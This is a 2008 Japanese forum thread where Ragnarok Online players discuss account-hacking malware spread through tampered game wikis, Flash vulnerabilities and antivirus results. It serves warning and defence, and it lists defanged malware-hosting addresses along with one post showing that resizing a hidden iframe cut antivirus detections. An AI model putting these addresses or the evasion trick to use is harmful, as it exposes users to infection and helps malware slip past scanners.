827 ：（○口○*）さん sage ： 2008/06/04(水) 00:56 ID:m8vk7Wkh0

>318 （○口○*）さん sage New! 08/06/04 00:32 ID:IaVlzlwY0
>ttp://www■gmog■jp/kinos/

騎士子萌えスレに貼られていたもの。whoisではIPに該当なし。
ソースチェッカーで見たら、swf呼び出しがあった。それ以降は確認してません。

「www■gmog■jp」のIPアドレスへの変換結果→「203■192■157■237」
「203■192■157■237」のドメイン名への変換結果→「ip-203-192-157-237■asianetcom■net」

828 ：（○口○*）さん sage ： 2008/06/04(水) 01:06 ID:IPxJaNTh0

それ、関係ない。

「キノスワールド〜パジャマの騎士〜」（配信元 GMO Games）の
公式サイト。
ttp://www.4gamer.net/games/047/G004717/20080603035/

829 ：（○口○*）さん sage ： 2008/06/04(水) 01:13 ID:oGYnp8Dq0

index■swf 0/32 ttp://www.virustotal.com/jp/analisis/ab684464a461aceeb1048c97773c1299

しかしswf拒否すると見られない公式サイトなんて怖すぎる…

830 ：（○口○*）さん sage ： 2008/06/04(水) 09:11 ID:QCHZUkyV0

もうブラウズは仮想PC上から使う方がいいな

831 ：（○口○*）さん sage ： 2008/06/04(水) 09:43 ID:M2a3ikrl0

パソコン使わなきゃウィルス踏まなくね？

832 ：（○口○*）さん sage ： 2008/06/04(水) 10:10 ID:cnDFr36A0

>>820-823
高木センセイのところにも載ったねぇ

>2008年06月03日
■ 通信路上の改竄攻撃発生に、Webサイト運営者が説明責任を負うのか？

833 ：（○口○*）さん sage ： 2008/06/04(水) 10:12 ID:3MQ5/ntC0

Wiiでブラウズすれば、ちっとは安全？

834 ：DC sage ： 2008/06/04(水) 10:39 ID:QCHZUkyV0

＠の俺にまかせろよ

835 ：（○口○*）さん ： 2008/06/04(水) 11:26 ID:4zyNgQRY0

別板で聞いたのですがスレチという事でここで聞きたいのですが
RO起動するとｎProが作動してctfmon.exeがbackdoorだとか出るんですが
ctfmon.exeって別に問題ないソフトでそれに偽造してるものがbackdoorらしいんだけど
nProは正規のものをウイルスだと断定してｱﾗｰﾄしてるのでしょうか？

836 ：（○口○*）さん sage ： 2008/06/04(水) 13:43 ID:vWVvQq7f0

日本語でおｋ

837 ：（○口○*）さん sage ： 2008/06/04(水) 14:45 ID:AYXQJFXx0

ctfmon.exeが「本物」なら問題ないですし、それをnProが誤検出したとは
（あり得ないことではないですが）聞いたことはないです。

が、偽のctfmon.exeを作るウイルス類はあるわけで

（例）
W32.Mandaph - Symantec.com
ttp://www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2008-042816-0445-99&tabid=2
マカフィー株式会社--セキュリティ情報-- BackDoor-DIW
ttp://www.mcafee.com/japan/security/virB2006.asp?v=BackDoor-DIW

多分感染して（偽ctfmon.exeをおかれて）いる状態なのでしょうから

他のウィルス対策ソフトで検索＆駆除（場合によってはOSクリーンインストールも）をおすすめします。

838 ：（○口○*）さん sage ： 2008/06/04(水) 16:34 ID:aQs8KTty0

「本物の」ctfmonを誤検知したのなら大騒ぎだろうねｗ

839 ：（○口○*）さん sage ： 2008/06/04(水) 17:31 ID:3MQ5/ntC0

関連記事ぽ
http://internet.watch.impress.co.jp/cda/news/2008/06/04/19815.html

>『魔法の剣』や『ドラゴンの鎧』を盗まれたと警察に届けても笑われるだけ。

>ガンホーのゲームのアカウントハッキングを受けたユーザーの9割が、
>セキュリティソフトを利用していなかったと聞いている。

840 ：（○口○*）さん sage ： 2008/06/05(木) 00:46 ID:gUiLcGqKO

株券の電子化のお陰でデータと現金の関連が説明しやすくなったよ
それでも「所詮はゲームでしょ？」と言われるけどな

841 ：（○口○*）さん sage ： 2008/06/05(木) 01:09 ID:Yx3lB9sT0

言葉のニュアンスはどうあれ、
ゲーム内で閉じている架空資産を現実の資産と認定すると、
ゲームシステムによっては犯罪者だらけになってしまうからな。(PKによるドロップとか)

アカウントハッキングそのものが犯罪であるという方向と、
それによって正常なサービスを受けられないって方向で主張するしかない。

842 ：（○口○*）さん sage ： 2008/06/05(木) 01:17 ID:qPTTXnjZ0

ただ有料アイテムがあるから、その扱いが微妙だな

843 ：（○口○*）さん ： 2008/06/05(木) 02:54 ID:E3jGDFIM0

各職テンプレサイトのWikiなどが改変されまくりの模様、注意されたし

844 ：（○口○*）さん ： 2008/06/05(木) 16:12 ID:+fywNMVIO

今の時代セキュリティソフト使わないやつとか存在したんだな

845 ：（○口○*）さん sage ： 2008/06/05(木) 16:22 ID:iQ1mWmmp0

>風間氏は、「ガンホーはゲーム会社として早期から
>セキュリティの啓蒙活動に積極的に取り組んできた企業。

846 ：（○口○*）さん sage ： 2008/06/05(木) 16:30 ID:JwivVod20

>>845
アンチガンホーが騒ぎたいのは分かるが自重

847 ：（○口○*）さん ： 2008/06/05(木) 17:48 ID:ELk5zJax0

クルセwikiは、垢ハックアドレスにかなり書き換えられてます
転送確認プラグインがあるので、回避すること事態は容易

848 ：（○口○*）さん sage ： 2008/06/05(木) 18:24 ID:eoOo2QTg0

そこまでは安全ですか？
その先に行けばアウトはわかるのですが、先ほど気づかず転送確認のページまでいきました（TT

849 ：（○口○*）さん sage ： 2008/06/05(木) 18:38 ID:RjduvW6D0

転送確認でアウトだったらなんのための確認なんだよｗ
というわけで転送確認ページまでは問題ない

850 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/06/05(木) 19:45 ID:tPgAGr2A0

Wikiに湧き出したfsbahsyggは書き込みを見て、
早めに追加したのですが被害が増えなければいいのですけど。
とりあえずちょこちょこ追加しています。

中の人の危うい事といえばリストを追加している時に
リネージュ資料室さんのウイルス更新状況から
www■xppsdo■cn/tianyi■htmと
www■fire122■cn/zi■htmから繋がっている物の中に
download■macromedia■com/pub/shockwave/cabs/flash/swflash■cab
というものがあるのですが、
ソースチェッカーオンラインにサラにかけてみると
fpdownload2■macromedia■com/get/shockwave/cabs/flash/swflash■cab
macromedia■comをGoogle先生にかけるとadobeデベロッパーセンターだった模様。
正規のダウンロードセンターまでリストに加えてしまうところでした。

macromedia■com自体は正規のFlashPlayerダウンロードサーバーで
www■live322■cn/4561■swfを
FlashPlayerが入っていない人に読み込ますために
www■xppsdo■cnとかの場所にスクリプトで一緒に併記している･･･
と推測したのですけど、だとしたら手が込んでいるなあとか。

851 ：（○口○*）さん sage ： 2008/06/05(木) 20:48 ID:hjRu6f/l0

今回のWiki改変は同一人物っぽいね
初期でIP遮断したケミWikiは荒らされてないし
今もまだ改変しまくってるからWiki管理者がアク禁しない限りいたちごっこかと

852 ：（○口○*）さん sage ： 2008/06/05(木) 20:53 ID:+dvh0Ym40

>>851
ところで荒らされてないWikiってあるのかな？
効率Wikiは完全編集シャットアウトだから良いけど

なんかROに関するWikiを片っ端からやってる気がするから

853 ：（○口○*）さん sage ： 2008/06/05(木) 21:09 ID:5LliKy3b0

>>852
超初心者wikiは手付かず状態

854 ：まとめ臨時 ◆kJfhJwdLoM sage ： 2008/06/05(木) 21:18 ID:RD/WPPQW0

殴りWizSage系のWikiとかも今のところは問題なさそう…。

855 ：（○口○*）さん sage ： 2008/06/05(木) 21:31 ID:RjduvW6D0

拳聖wikiも平和だな。平和というか、スルーされてるというか…
さすがマイナー職（´・ω・）

856 ：（○口○*）さん sage ： 2008/06/05(木) 21:36 ID:TYEpIoW20

ここに書いたら改変対象に加えられたりして…だったらやだな。

857 ：（○口○*）さん sage ： 2008/06/05(木) 21:38 ID:KNwgNs6U0

アコプリWikiも平和だな

狙いを絞り込んでるのかWiki管理人が対応済みなのかは分からないけど
被害を受けてる方が少ないんじゃない？

858 ：（○口○*）さん sage ： 2008/06/05(木) 21:42 ID:OGRfypik0

>>850
ホームページの作り方みたいなのでFlashの入れ方の
テンプレと言ってもいい書き方だよ(objectタグ、embedタグ)。
手が込んでいるというよりコピペしただけかと。
リネージュ資料室さんの更新状況は
埋め込まれたURIっぽいのを機械的に拾ってるので人手による精査は必要。

859 ：（○口○*）さん sage ： 2008/06/05(木) 21:43 ID:OGRfypik0

最も危険なドメインは香港の「.hk」、米McAfee調査
ttp://internet.watch.impress.co.jp/cda/news/2008/06/05/19835.html
そういや英国から中国へ返還されてだいぶ経つなぁ。

860 ：（○口○*）さん sage ： 2008/06/05(木) 22:39 ID:+dvh0Ym40

貧スレWiki・RO Common Data・クエスト案内所の被害が無いのは確認

861 ：（○口○*）さん sage ： 2008/06/05(木) 22:47 ID:TYEpIoW20

というか、その被害が無いってのは「現時点で」ってことも忘れずに。

確認の直後に書き換えられている可能性もある訳だから。

862 ：（○口○*）さん sage ： 2008/06/05(木) 22:56 ID:1sO+nJ4G0

調べたこと無いので分からないんだけれど、今ある攻撃って
「どの脆弱性を突いた」ものなんだろう？
閲覧だけで感染のおそれがある、では、感染しなくてもそれを
確かめられず安心できないというのもある。

ただ、その話をすればきりがなくなるのも事実なので、何か新しい
アプローチが必要なのかもしれない。

863 ：（○口○*）さん sage ： 2008/06/05(木) 23:00 ID:jtEktfia0

誰でも編集できるWikiのリンクが改竄されてるだけなんだが
どこから脆弱性の話になるのか解説ｷﾎﾞﾝ

864 ：（○口○*）さん sage ： 2008/06/05(木) 23:01 ID:jtEktfia0

・・・その改竄先を踏んでしまった場合の話か。ｽﾏﾝｶｯﾀ

865 ：（○口○*）さん sage ： 2008/06/05(木) 23:06 ID:RjduvW6D0

現状で旬（笑）なのはFlashPlayerの脆弱性かねえ。
他の既知の脆弱性をついた攻撃も併用してるだろうし、一概に「コレ」と言えるようなものじゃないと思うけど

866 ：（○口○*）さん sage ： 2008/06/05(木) 23:13 ID:E3jGDFIM0

昔のをそのまま使ってたり、最新のをいち早く使ってきたり様々
セキュリティわかってない人間も多いから、古いの置いておいても仕掛けた側は引っかかったらラッキーくらいに思っておいてるんじゃない？

867 ：（○口○*）さん sage ： 2008/06/05(木) 23:22 ID:xBicn86c0

今回の改竄も、どうやら毎度おなじみODNリモホから行われているようだけど、各Wiki管理サイドは、ISPに対して迷惑行為の
通報は行っているのだろうか。
未着手のようであれば、それこそ連名で厳重抗議を行い、強制退会に持ち込ませるべきだろう。
あるいは、再三の警告を送っても効果が薄いようであれば、半永久的IP BANも止むなしだとは思う。

それとは別に、RBLのように複数Wikiから参照できるブラックリスト・システムも必要かもしれない。
それぞれの管理人の事情で、個別にブロック対応する足並みが揃わないのだから、共通化InterWikiNameのように一意で指定する
ロジックを組み込むとか。rowiki.jpのように基盤はある程度整っているし。

868 ：（○口○*）さん sage ： 2008/06/05(木) 23:55 ID:hS3zrSu10

さくらインターネットの件が公式に出てますね
ttp://www.sakura.ad.jp/news/archives/20080605-002.news

■発生日時
　　2008年6月1日(日)01時52分 〜 6月2日(月)17時23分の間

■対象のウェブサイト
　　専用サーバ 10M スタンダードの一部
　　（IPアドレス 219.94.145.0 〜 219.94.145.127 の範囲で99台）

869 ：（○口○*）さん sage ： 2008/06/06(金) 00:08 ID:qYZX087H0

今は危ないって事を知らずにwikiでさっきリンカの調べものしてたんですけど
カスペルでオンラインスキャンをしたらTrojan-Clicker.HTML.IFrame.jvというものがでてきました
転送確認だとかそういうのは見た覚えないんですが・・・
これはwiki見てた事が原因でかかったと見てもいいんですか？

870 ：（○口○*）さん sage ： 2008/06/06(金) 00:11 ID:z0zcjBx30

>869
「Wikiを見た」だけだと感染しない。
「Wikiのリンクをクリックして不審な外部サイトを見た」のなら、その可能性が大。

871 ：（○口○*）さん sage ： 2008/06/06(金) 00:19 ID:qYZX087H0

キルの考察だとか基礎知識だとかいうところをクリックしてちょろっと見ただけで
そこも特に変なところはなかったんです
変な外部サイトみたいなのには飛んでません

872 ：（○口○*）さん sage ： 2008/06/06(金) 00:19 ID:qYZX087H0

スが抜けてたorz

873 ：（○口○*）さん sage ： 2008/06/06(金) 00:29 ID:P75MQlKG0

リンカWikiの管理人さんが今日の0：09に対応完了しました、とコメント残している。
>869はそれ以前の状態でWikiから踏んだ可能性があるわけだから、gdgd言ってもしょうがないよ
とりあえず心配なら再ｲﾝｽﾄｰﾙコース。
あとこれからWikiみたいな編集可能なページ見る時は十分注意するしかない。今回のことで
以降の対応、しっかりできるようになるだろ？　前向きに見ようぜ

874 ：（○口○*）さん sage ： 2008/06/06(金) 00:30 ID:Fl1Dcarp0

外部リンクへのクッションがないものもある。

iframeで別サイトを呼び出す場合、元のサイトそのものは普通に表示される。

危険URLを読み込んでいる可能性があるので、スキャンして除去した上でOS入れなおしを推奨。

875 ：（○口○*）さん sage ： 2008/06/06(金) 00:48 ID:lU4ja0K10

iframeをブラウザなどのプラグイン、
もしくはセキュリティ対策ソフトで検出出来る奴ってある？

ものによってはめちゃめちゃ反応しそうだけど。

876 ：（○口○*）さん sage ： 2008/06/06(金) 00:57 ID:qYZX087H0

なるほどー
しかしカスペルのお試しでスキャンしたら見つかったのに
本命のマカフィーさんでスキャンしても異常なしと出ます・・
何とか削除する方法を色々と調べてるのですが
こういう知識はさっぱりなので苦戦しています

877 ：（○口○*）さん sage ： 2008/06/06(金) 00:57 ID:XyV1GWt80

あったとしてもJavaScriptで隠されると検出難しいような

878 ：（○口○*）さん sage ： 2008/06/06(金) 00:59 ID:yhM9ImhM0

>>875
FirefoxならNoScriptというプラグインで iframeの禁止が出来る

879 ：（○口○*）さん sage ： 2008/06/06(金) 01:07 ID:wCxG9qvx0

>>867
>それとは別に、RBLのように複数Wikiから参照できるブラックリスト・システムも必要かもしれない。
>それぞれの管理人の事情で、個別にブロック対応する足並みが揃わないのだから、共通化InterWikiNameのように一意で指定する
>ロジックを組み込むとか。rowiki.jpのように基盤はある程度整っているし。

ことあるごとに，ときに各サイト管理人にプレッシャーをかけつつ，こういう素晴らしい提案を
なさる方がいらっしゃるけど，いつも同じ方かな?

むしろ提案のみならず，それを主催し，保守・管理していって貰いたいものです.

880 ：（○口○*）さん sage ： 2008/06/06(金) 01:14 ID:yhM9ImhM0

ブラックリストの難しいところは、信用できるリストをこまめに管理すること

リストを参照してアクセス制御すること自体は大して問題ではない

881 ：（○口○*）さん sage ： 2008/06/06(金) 01:21 ID:XyV1GWt80

情報提供の手段はいくらでもあるとして、常にアクティブな管理サイドの
人間がいないと「生きたリスト」を維持するのは難しいね。
URLのブラックリストがそれを如実に表している。

882 ：（○口○*）さん sage ： 2008/06/06(金) 01:22 ID:z0zcjBx30

ハクスレ815や>869の検出結果がちょっと気になったので
teamerblogのソースを拾ってきて、iframeの部分を書き換えて
VTに投げてみた

>width="0" height="0" frameborder="0"　→　VT　13/32　(オリジナル)

ここからサイズを変更してみると

>width="1" height="0" frameborder="0"　→　VT　3/32
>width="0" height="1" frameborder="0"　→　VT　3/32
>width="0" height="0" frameborder="1"　→　VT　3/32
>width="1" height="1" frameborder="0"　→　VT　3/32
>width="1" height="0" frameborder="1"　→　VT　3/32
>width="0" height="1" frameborder="1"　→　VT　3/32
>width="1" height="1" frameborder="1"　→　VT　3/32

なんとなくそんな気はしてたんだよね……


最終的に罠スクリプトやEXE等を引っかけてくれれば十分だし
あのソースだと仕方がないのは判るけど、なんかやっつけ仕事に
思えて仕方がない（苦笑

883 ：（○口○*）さん sage ： 2008/06/06(金) 01:30 ID:RyetHJq70

>876
ソフトによって検出できないウィルスってのは確実にある
カスペが信用できないなら他のアンチウイルスソフト試してみたら？
avast! 4とかならフリーで使えるし

でも正直、被害に遭う前に、データ退避してPC初期化したほうが・・・

クリーンな環境に戻してから、すぐにパスワードを変更
もし他にパソコンがあるなら、そっちからガンホーのパスとアカウントのパスを変更

初期化できない事情があるなら、せめてPeerGuardianだけでも入れたほうがいい

884 ：（○口○*）さん sage ： 2008/06/06(金) 02:00 ID:TQ1IKYwE0

>>874
それはROの職Wiki内とかでも一般ユーザーの更新で出来ちゃうのでしょうか？

885 ：（○口○*）さん sage ： 2008/06/06(金) 02:24 ID:lHoGydKF0

>>884

link.phpを実装してる場合を仮定すると
link.phpそのものを改変するは通常無理

886 ：（○口○*）さん sage ： 2008/06/06(金) 07:07 ID:7/5jUEZZ0

>>882
脆弱性を突くコードが書いてあるならともかく
親frame送ってもしゃーないでしょ。

887 ：（○口○*）さん sage ： 2008/06/06(金) 12:08 ID:9CD+rdne0

俺もクルセイダーwiki開いた後に検出されたけど感染してるオブジェクトをよく見てみたら
Janeで2ch見た時の画像のキャッシュだったｗｗｗ
これは単に2chで踏んだものか・・(＾o＾)

888 ：（○口○*）さん sage ： 2008/06/06(金) 17:26 ID:VwdBQTop0

基本的にJavascriptOFFならとんでもかからないよな？
JavaOFFでも踏んだら引っかかる垢ハクアドレスとか存在する？

889 ：（○口○*）さん sage ： 2008/06/06(金) 17:32 ID:Fl1Dcarp0

するぜ

890 ：（○口○*）さん sage ： 2008/06/06(金) 17:32 ID:oKkn+TL10

>>888
ちょっと上にあるFlash脆弱性の話とか。

891 ：（○口○*）さん sage ： 2008/06/06(金) 17:42 ID:NXF0EwAr0

>>888
IEならActiveXも落とさな

892 ：（○口○*）さん sage ： 2008/06/06(金) 18:29 ID:+v3JKs9U0

「〜〜しておけば踏んでも大丈夫」
なんてこと少ないからそう言う考えはやめた方が良い、随分前から言われてるけど

893 ：（○口○*）さん sage ： 2008/06/06(金) 19:05 ID:PMsAP3hg0

FoxでNoScript+AdBlock導入済み。
ウィルス対策はカスペ。
確かに100％安全ってのはないと思うけど、今出回ってる垢ハックアドレスはどうなのかなあと。
Javaは初見サイトではOFFになってて、AdBlockでFlashも許可した物以外OFF。
なもんでこれで既存の垢ハクサイトは大丈夫かな？という疑問だったんだ。

894 ：（○口○*）さん ： 2008/06/06(金) 19:07 ID:TWdWSPUT0

癌公認ネカフェでカスペオンラインスキャンしたら
Trojan-Spy.Win32.VB.mn
ってのが出たんだけど、C:\WINDOWS\system32\downloadmax.net.exeってファイル名で
これはROプレイしても大丈夫ですか？
ウィルスチェックだけで１．５hもかかった・・

895 ：（○口○*）さん sage ： 2008/06/06(金) 19:10 ID:L0f71DDJ0

>>893
いやだからFlashplayerそのものに脆弱性があったから
サイトによって許可するしないは関係ないんだってば

896 ：（○口○*）さん sage ： 2008/06/06(金) 19:51 ID:oKkn+TL10

>>893
とりあえずJavascriptとJavaは別物だから区別してほしい。
文脈でわかるけど紛らわしいよ。

それで「既知の手段に対して安全か」って話だよね？
さくらの一件は要するに「信頼しているサイトの経路を乗っ取る」
というものだから、許可したドメインにウィルスを仕込まれることになる。
だから全サイトでscriptもflashも止めるってわけじゃないなら
既存の手段の組み合わせだけでも穴は生まれる。

結局は>>892。

897 ：（○口○*）さん sage ： 2008/06/06(金) 19:54 ID:XBL80nue0

>>894
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FHACHILEM%2ER&VSect=Td
ttp://hjdb.higaitaisaku.com/database.cgi?cmd=dp&num=479
ROとは直接関係なさそうにも思えるが、個人的にはシステムドライブからその手の物が検出される≒セキュリティ対策がザルな店舗は
使いたくないな。
検出した画面のSSを撮っておいて、責任者出てこいを推奨。

>>895
FirefoxのNoScriptは、許可サイト以外ではコード自体のレンダリングを端折る=Flash自体がロードされないのだが。
無論、だからといってFlash Playerのバージョンを9.0.124未満で常用して構わない訳ではないが。

898 ：（○口○*）さん sage ： 2008/06/06(金) 20:11 ID:TWdWSPUT0

>>897
詳細thx、ROとは関係なさそうだな。
感染活動行わないっていうからファイル削除してプレイするわ

899 ：（○口○*）さん sage ： 2008/06/06(金) 20:52 ID:Fl1Dcarp0

>>898
再起動すると復活するぜｗｗｗ

900 ：（○口○*）さん sage ： 2008/06/06(金) 21:43 ID:AtowH7us0

今しがた、クルセwikiを見ようとして、転送確認にて不審なURLへの移動を回避したのですが、
トップページ（http://crsdr.netgamers.jp/）のみ閲覧した状態では大丈夫でしょうか・・・？

初歩的な質問で申し訳ありませんが、もしアウトでしたらご指摘お願いします。

901 ：（○口○*）さん sage ： 2008/06/06(金) 21:51 ID:Fl1Dcarp0

TOPページヲ開いただけ OK
転送確認ページ OK
転送したがセキュリティソフトがブロックした 多分、セーフだが、全部ブロックで来たか不明なのでグレー
転送した（セキュリティソフトなしorすり抜け） NG

902 ：（○口○*）さん sage ： 2008/06/06(金) 22:32 ID:lHoGydKF0

>>900
転送確認ページまでは大丈夫
その先をクリックしたならご愁傷様

903 ：（○口○*）さん sage ： 2008/06/06(金) 22:48 ID:+v3JKs9U0

なんか似たような説明を毎回してる気がするな
以降Wiki転送に関してのテンプレは>>901でOKかな？

904 ：（○口○*）さん sage ： 2008/06/06(金) 22:51 ID:YgoNu9vb0

転送っていう言葉は誤解をまねく。
外部リンク確認とかクッションページとかだし。

905 ：（○口○*）さん sage ： 2008/06/06(金) 23:34 ID:7/5jUEZZ0

ウイルスびっくりテクノロジー
ttp://pc.nikkeibp.co.jp/article/trend/20080501/1001703/
タイトルはアレだけど、読み物として。

906 ：（○口○*）さん sage ： 2008/06/07(土) 00:38 ID:QuaiTJNJ0

ところでアウトブレイクのせいでレス900超えたんだが、新スレと
ハクスレの統合、どうする？

個人的な意見では、統合前提でとりあえずLiveROにスレ建てして
その後RO板に行くなら是非スレ持ち込み、と考えるんだが。

もう一回アウトブレイクおきたら話す間もなく埋まるだろうし、本気で
考える時期じゃないかな？

907 ：（○口○*）さん sage ： 2008/06/07(土) 00:44 ID:iD2rDPqj0

まぜこぜにしたら、それはそれで混乱起きないかなぁ。
ハクスレは危険URLの情報収集を主として、適切な名前に変える
なりして残していいと思う。

908 ：（○口○*）さん sage ： 2008/06/07(土) 01:07 ID:iYqGef6i0

スレ1つでいいよ。個人意見としては。

変な誘導が湧くばかりだし、踏んだかもとか焦ってる人にも混乱の元に
なってるし、分かれてる価値がほとんど無い。ところで「ハクスレ」は
酷い略だと思う。

909 ：（○口○*）さん sage ： 2008/06/07(土) 03:19 ID:CuF1Kj/n0

ハクスレ
に酷い意味でもあるの？

910 ：（○口○*）さん sage ： 2008/06/07(土) 03:41 ID:KOJwqFZy0

単なる危険URL集積所を、MMOBBSのスレで行う意味は薄い支那。
慌ててドット抜きを忘れたまま張って削除依頼とか、ノイズが増える要素もある。
対処に必要なシステムは、殆ど外部で出来上がった感じもあるし。

911 ：（○口○*）さん sage ： 2008/06/07(土) 06:37 ID:o3/OGzJX0

現状、誘導厨沸かなきゃ困って無いってのも現状だけどな。

当座は２つのままでいいんでない。次スレでゆっくりスレの行く末を検討しようや。

912 ：（○口○*）さん sage ： 2008/06/07(土) 07:10 ID:O3XrClkE0

つまり誘導厨をアク禁依頼すればいいんですね、わかります

誘導厨が１人とすればの話だが

913 ：（○口○*）さん sage ： 2008/06/07(土) 07:55 ID:xC0KHjJo0

何度か報告してるけど相手にもされないんだよね

914 ：（○口○*）さん sage ： 2008/06/07(土) 08:00 ID:O3XrClkE0

誘導厨の行動が、一応はハクスレのテンプレに則ってるからかなぁ
ハクスレの次スレはテンプレから「重要な(ry」を削除して、それからアク禁依頼すべきか
そもそもテンプレから「重要な(ry」が消えれば誘導厨も消えるかな

915 ：（○口○*）さん sage ： 2008/06/07(土) 08:41 ID:9V+Bs5C00

>>910に同意というかなんというか
向こうの1の
＞アカウントハックに関する情報の集積・分析を目的とするスレです。
＞被害や攻撃等のアカウントハックの具体的事例に関して扱います。
＞重要な(以下略

アカウントハックに関する情報、具体的事例って
今のスレからすると危険アドレスそのものだけ、目的はそれの収集・報告だけだよね？
それってROセキュリティWikiに投稿フォームとか作って、それをWiki内で纏めてけばよくね？

まあWikiだから直接改竄される可能性もあるけど、もとから危険アドレス満載って考えもあるし
両方のスレのテンプレ案と検体提出先の3ページだけってのもさみしいし

916 ：（○口○*）さん sage ： 2008/06/08(日) 13:54 ID:BA3lNYUP0

>906の案でいいんじゃない？
スレタイにアカウントハック（アカハック）の文字入れたら
混乱はしないだろうし。

新スレはこっちが先になるから、向こうの新スレの段階で
LiveROの新スレに誘導すればいい。

Ragnarok板にないと困るというなら、新スレで論議すれば
済むと思うな。

917 ：（○口○*）さん sage ： 2008/06/08(日) 13:57 ID:oRrK6QSe0

あっちの方が見てる人工も多いし、
情報欲しい人はとりあえず向こうでハックで検索して、
そこで出るあっちに書き込まれやすいのは仕方ない気もする。

918 ：（○口○*）さん sage ： 2008/06/08(日) 14:06 ID:ckP2k02J0

良く是非スレに持ち込むって言ってる人が居るけど、
あそこは「新スレを立てるときに是非を問うスレ」だよ？

統合とかは該当のスレの住人同士で話し合って決めることで管理人さんに是非を問うものじゃない

919 ：（○口○*）さん sage ： 2008/06/08(日) 14:29 ID:fVQY59oY0

最近では料理スレか、RO板に新規スレ立ったのは
あの時は既存スレと統合の話も一部であったからなあ
今回はLiveRo板とRO板とで交代でもしない限り
是非スレの要素はないと思われる

とりあえずこうか
A)現行のまま、但し役割分担は強化
B)このスレのみ存続、垢ハックスレは廃止
　URL収集の後継としてセキュリwikiなどを活用
C)垢ハックスレの取り扱い内容を緩和
　アカウントハックネタに限り、セキュリティ対策・相談・雑談も受付
　(Aとは逆の方向)
D)垢ハックスレとこのスレとを交換
　このスレがRO板に移動、垢ハックスレはLiveRO板へ
　「ROに特化した話題」ではないが、プレーヤーとして必須の情報であり、
　何か起こった場合RO板をまず見ることが多いと思われるため

CとDは新規だが、こういう方向性もあるかなと

920 ：（○口○*）さん sage ： 2008/06/08(日) 14:58 ID:FX5vuqbW0

>URL収集の後継としてセキュリwikiなどを活用
これwikiに書けってこと? なら面倒だからやらないかな。

921 ：（○口○*）さん sage ： 2008/06/08(日) 15:25 ID:EWtradu40

>919
A)現実的に無理。
　それに狭義のアカハックに限ると結局BOTが沸く。

B)一番現実的。
　でもURL収集にWikiというのは反対。(後にまとめ情報を書くのなら可)
　危険アドレスの報告はスレ閲覧者に警告を発する意味もあるから、分離すると
　見なくなる人が殆どになると思う。(LiveRO板以上に見ない人が多数と予想)

C)一見ハクと無関係に見えて実はハクが関係してた、というケースもあり
　書き込み時点では判断つかない。(ゆず・さくらの件)
　一括でやるならセキュスレの性質で行かないと、A)と同じでBOTが沸く。

D)セキュスレが全般見る性質上、ハク報告に限定したハクスレをLiveRoに置いても
　使われずにdat落ちするだけじゃないか？

Wikiの活用方法は、今のまとめ臨時のサイトや利ネージュ資料室を参考に
各種対策等を書き込んでいければいいと思うが、運用方法は今後の議題。

まずはLiveRoで統合、それから必要ならRO板に移転、の流れ(つまりB案改や>906案)に
した方がいいと思う。

922 ：（○口○*）さん sage ： 2008/06/08(日) 15:26 ID:5eExmpLX0

ハクスレ828
i115■swf 15/32 ttp://www.virustotal.com/jp/analisis/1a9e793f5dfa5870420a11adfa4f7f20

923 ：（○口○*）さん sage ： 2008/06/08(日) 15:42 ID:FX5vuqbW0

ノートン…Adobeと共同調査したのに…

924 ：（○口○*）さん sage ： 2008/06/09(月) 00:27 ID:Dz/FOxrN0

MixiのRO関係コミュに爆撃されてる、懐かしいアドの代物
www■geocities-jp■com/ragnarokonline/ca-pub-1828667301391598■zip
RARファイルの拡張子偽装で、中身は同名のEXE

VT　15/32　ttp://www.virustotal.com/analisis/3f8cae65c183c881785fc65476f470b0

Avast/BitDefender/マカフィー/ノートン/NOD32がスルー。
引っかかる人は居ないと思うけど、ご注意を。

>新スレ統合の件
個人的には、統合された時にRO板でもLiveRO板でも、どっちにあっても気にしないけど
こうやって見つけたものを報告するのに、Wiki池と言われるのは勘弁。

925 ：（○口○*）さん sage ： 2008/06/10(火) 15:02 ID:GfziOW5x0

Windows XP SP3のレジストリ破損問題、シマンテックが対応ソフトをリリース
「Nortonの一部機能も原因」と責任の一部を認める
ttp://www.computerworld.jp/topics/vs/110989.html
約2週間前、Windows XP SP3にアップグレードしたSymantec製品のユーザーから、
「Windowsのデバイス・マネージャに何も表示されなくなった」「ネットワーク接続が削除された」
「レジストリに大量の不正エントリが追加された」といった問題が報告されたのを受け、
SymantecはSymRegFixの提供を約束していた。Symantecは当初、
これらの問題の原因はMicrosoftにあるとしていたが、後に責任の一部を認めた。

そもそもSymantecは、MicrosoftのFixccs.exeに問題の原因があるとの見方を示していた。
また、レジストリ変更を監視する同社製以外のセキュリティ・ソフトウェアも、
レジストリ破損の原因になりうるとも主張していた。だが、そうした事例は、
Microsoftのサポート・フォーラムに今のところほとんど報告されていない。

926 ：（○口○*）さん sage ： 2008/06/10(火) 21:31 ID:GfziOW5x0

「QuickTime 7.5」公開、5件の脆弱性を修正
ttp://internet.watch.impress.co.jp/cda/news/2008/06/10/19878.html
ttp://www.apple.com/jp/quicktime/download/

927 ：（○口○*）さん sage ： 2008/06/11(水) 01:13 ID:wtwZIUK+0

カスペオンラインスキャン使おうとしたら、以下の文が出て
出来なくなったんだけど、どうすればいい？心当たりが無い。

>製品 カスペルスキー オンラインスキャナ で現在使用されているキーは Kaspersky Labsによりブロックされました!

928 ：（○口○*）さん sage ： 2008/06/11(水) 01:16 ID:zk77qCUT0

http://www.kaspersky.com/kos/jpj/partner/default/kavwebscan.html
※ カスペルスキーオンラインスキャナ PRO, ベータ版をインストールしている場合、予め"プログラムの追加と削除"からアンインストールしておく必要があります。
※ 「ライセンスの有効期限」が切れている旨のメッセージが表示される場合、カスペルスキーオンラインスキャナをアンインストール後、再度アクセスください。

929 ：（○口○*）さん sage ： 2008/06/11(水) 01:44 ID:wtwZIUK+0

>>928
一旦、オンラインスキャナアンインスコしたけどダメだった
数週間前までは普通にできたのになぜ・・

930 ：（○口○*）さん sage ： 2008/06/11(水) 03:49 ID:kAdUwrwWO

携帯から失礼します

アカハクにやられまして

すぐ癌に通報して別ＰＣからアトラクションパスと癌パス変更、商人にアイテム集められてたのでとりあえず商人だけキャラパス変更しました

今ノートンでオンラインスキャンかけてるところなんですが他にやるべき事はありますか？

931 ：（○口○*）さん sage ： 2008/06/11(水) 03:53 ID:Uum6y+O10

>>929
同じく今試してみたけど同エラー、数日前までは普通に出来てた
PCにインストールされてるアンチウイルスソフトはNOD32

